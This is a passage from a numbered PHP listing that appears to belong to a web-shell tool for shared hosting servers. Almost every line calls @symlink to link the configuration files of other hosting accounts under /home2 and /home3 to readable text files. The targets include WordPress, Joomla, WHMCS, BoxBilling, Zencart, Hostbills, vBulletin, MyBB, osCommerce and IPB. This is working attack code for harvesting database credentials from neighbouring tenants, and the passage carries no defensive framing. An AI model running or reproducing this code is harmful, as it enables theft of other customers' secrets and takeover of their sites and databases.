1517. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1518. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1519. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1520. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1521. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1522. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1523. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1524. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1525. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1526. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1527. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1528. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1529. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1530. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1531. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1532. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1533. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1534. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1535. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1536. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1537. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1538. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1539. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1540. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1541. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1542. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1543. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1544. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1545. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1546. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1547. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1548. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1549. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1550. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1551. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1552. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1553. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1554. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1555. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1556. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1557. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1558. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1559. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1560. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1561. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1562. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1563. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1564. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1565. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1566. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1567. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1568. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1569. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1570. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1571. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1572. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1573. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1574. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1575. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1576. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1577. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1578. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1579. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1580. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1581. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1582. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1583. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1584. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1585. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1586. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1587. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1588. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1589. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1590. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1591. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1592. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1593. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1594. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1595. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1596. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1597. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1598. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1599. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1600. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1601. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1602. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1603. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1604. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1605. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1606. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1607. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1608. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1609. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1610. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1611. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1612. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1613. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1614. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1615. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1616. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1617. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1618. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1619. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1620. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1621. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1622. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1623. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1624. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1625. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1626. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1627. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1628. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1629. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1630. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1631. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1632. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1633. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1634. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1635. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1636. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1637. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1638. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1639. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1640. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1641. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1642. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1643. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1644. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1645. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1646. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1647. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1648. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1649. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1650. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1651. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1652. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1653. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1654. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1655.  
1656. //Home3
1657.  
1658. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1659. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1660. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1661. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1662. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1663. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1664. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1665. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1666. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1667. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1668. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1669. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1670. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1671. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1672. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1673. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1674. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1675. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1676. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1677. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1678. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1679. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1680. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1681. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1682. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1683. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1684. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1685. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1686. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1687. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1688. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1689. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1690. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1691. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1692. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1693. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1694. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1695. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1696. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1697. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1698. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1699. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1700. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1701. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1702. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1703. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1704. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1705. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1706. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1707. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1708. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1709. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1710. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1711. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1712. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1713. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1714. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1715. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1716. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1717. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1718. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1719. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1720. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1721. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1722. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1723. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1724. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1725. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1726. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1727. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1728. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1729. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1730. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1731. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1732. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1733. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1734. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1735. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1736. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1737. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1738. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1739. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1740. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1741. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1742. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1743. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1744. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1745. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1746. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1747. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1748. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1749. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1750. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1751. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1752. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1753. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1754. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1755. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1756. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1757. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1758. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1759. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1760. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1761. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1762. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1763. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1764. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1765. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1766. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1767. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1768. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1769. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1770. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1771. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1772. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1773. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1774. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1775. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1776. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1777. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1778. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1779. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1780. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1781. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1782. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1783. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1784. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1785. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1786. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1787. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1788. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1789. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1790. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1791. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1792. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1793. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1794. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1795. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1796. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1797. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1798. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1799. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1800. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1801. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1802. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1803. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1804. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1805. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1806. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1807. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1808. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1809. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1810. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1811. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1812. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1813. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1814. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1815. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1816. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1817. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1818. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1819. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1820. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1821. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1822. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1823. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1824. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1825. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1826. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1827. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
